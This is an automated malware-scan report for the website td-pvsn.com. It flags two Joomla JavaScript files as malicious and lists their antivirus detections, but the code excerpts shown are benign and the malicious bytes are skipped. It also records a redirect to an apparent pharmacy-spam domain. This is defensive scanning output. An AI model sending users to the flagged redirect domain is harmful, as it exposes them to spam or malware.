Malware Scanner report for td-pvsn.com

Malicious/Suspicious/Total urls checked
2/0/16
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "td-pvsn.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=td-pvsn.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://td-pvsn.com/
200 OK
Content-Length: 15034
Content-Type: text/html
clean
http://td-pvsn.com/media/system/js/caption.js
200 OK
Content-Length: 13222
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3199 bytes are skipped ...

Antivirus reports:

AntiVir: JS/Agent.CB.5
Avast: JS:Redirector-AKA [Trj]
Ad-Aware: Trojan.JS.Agent.JAB
Ikarus: JS.Trojan.JS.Iframe
Rising: JS:Malware.JCrypto!1.9BF9
nProtect: Trojan.JS.Agent.JAB
K7AntiVirus: Trojan ( 91ee82b70 )
TrendMicro-HouseCall: TROJ_GEN.F47V1029
Comodo: TrojWare.JS.Agent.TC
Emsisoft: Trojan.JS.Agent.JAB (B)
K7GW: Exploit ( 04c553061 )
DrWeb: JS.Redirector.188
Kaspersky: HEUR:Trojan.Script.Generic
MicroWorld-eScan: Trojan.JS.Agent.JAB
Fortinet: JS/Redirector.NJG
NANO-Antivirus: Trojan.Script.Redirector.bqiube
F-Prot: JS/Redir.SA
AVG: HTML/Framer
Norman: ShellCode.V
GData: Trojan.JS.Agent.JAB
Commtouch: JS/Redir.SA
ESET-NOD32: JS/Redirector.NJG
BitDefender: Trojan.JS.Agent.JAB

http://td-pvsn.com/index.php/works
200 OK
Content-Length: 10815
Content-Type: text/html
clean
http://td-pvsn.com/index.php/services/services
200 OK
Content-Length: 18581
Content-Type: text/html
clean
http://td-pvsn.com/index.php/reviews
200 OK
Content-Length: 20339
Content-Type: text/html
clean
http://td-pvsn.com/media/system/js/modal.js
200 OK
Content-Length: 21847
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var SqueezeBox = {
presets: {
size: {x: 600, y: 450},
sizeLoading: {x: 200, y: 150},
marginInner: {x: 20, y: 20},
marginImage: {x: 150, y: 200},
handler: false,
adopt: null,
closeWithOverlay: true,
zIndex: 65555,
overlayOpacity: 0.7,
classWindow: '',
classOverlay: '',
disableFx: false,
onOpen: Class.empty,
onClose: Class.empty,
onUpdate: Class.empty,
onResize: Class.empty,
onMove: Class.emp
... 3366 bytes are skipped ...

Antivirus reports:

Qihoo-360: Trojan.Generic
AntiVir: JS/Agent.CB.5
Avast: JS:Redirector-AKA [Trj]
Ad-Aware: Trojan.JS.Redirector.BOO
Ikarus: Trojan.JS.Redirector
Rising: JS:Malware.JCrypto!1.9BF9
nProtect: Trojan.JS.Redirector.BOO
K7AntiVirus: Trojan ( 91ee82b70 )
TrendMicro-HouseCall: TROJ_GEN.F47V0122
Comodo: TrojWare.JS.Agent.TC
Emsisoft: Trojan.JS.Redirector.BOO (B)
K7GW: Exploit ( 04c553061 )
DrWeb: JS.Redirector.188
Kaspersky: HEUR:Trojan.Script.Generic
MicroWorld-eScan: Trojan.JS.Redirector.BOO
NANO-Antivirus: Trojan.Script.Redirector.bqiube
F-Secure: Trojan.JS.Redirector.BOO
F-Prot: JS/Redir.SA
AVG: HTML/Framer
Sophos: Troj/JSRedir-LX
GData: Trojan.JS.Redirector.BOO
Commtouch: JS/Redir.SA
ESET-NOD32: JS/Redirector.NJG
BitDefender: Trojan.JS.Redirector.BOO

http://td-pvsn.com/components/com_phocagallery/assets/js/highslide/highslide-full.js
200 OK
Content-Length: 109244
Content-Type: application/javascript
clean
http://td-pvsn.com/index.php/request
200 OK
Content-Length: 17630
Content-Type: text/html
clean
http://td-pvsn.com/includes/js/joomla.javascript.js
200 OK
Content-Length: 26664
Content-Type: application/javascript
clean
http://td-pvsn.com/index.php/contacts
200 OK
Content-Length: 14688
Content-Type: text/html
clean
http://api-maps.yandex.ru/1.1/index.xml?key=APQox00BAAAAfQDwfgIAbwGogrdDOk5c-iVOlIiCOXqNzyoAAAAAAAAAAAB0SfTYBZ7yMnEeRWuNLKTevx4Y0g==
200 OK
Content-Length: 5487
Content-Type: text/javascript
clean
http://td-pvsn.com/index.php/contacts?tmpl=component&print=1&page=
200 OK
Content-Length: 9789
Content-Type: text/html
clean
http://td-pvsn.com/index.php/
200 OK
Content-Length: 15046
Content-Type: text/html
clean
http://td-pvsn.com/index.php?view=article&catid=1:articles&id=53:2011-05-06-01-20-10&tmpl=component&print=1&layout=default&page=
200 OK
Content-Length: 10065
Content-Type: text/html
clean
http://td-pvsn.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Tue, 24 Feb 2015 14:11:23 GMT
Location: http://onlinedrugvalue.eu/
Server: Jino.ru/mod_pizza
Content-Length: 210
Content-Type: text/html
clean
http://onlinedrugvalue.eu/
500 timeout
Content-Length: 30
Content-Type: text/plain
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: td-pvsn.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Feb 2015 14:11:17 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Feb 2015 14:11:17 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: aecad04d8ec5aecaefbb8a89f8fc816b=b0a4fca07a369bc1cbc72b636512d076; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: td-pvsn.com
Referer: http://www.google.com/search?q=td-pvsn.com

Result:
The result is similar to the first query. There are no suspicious redirects found.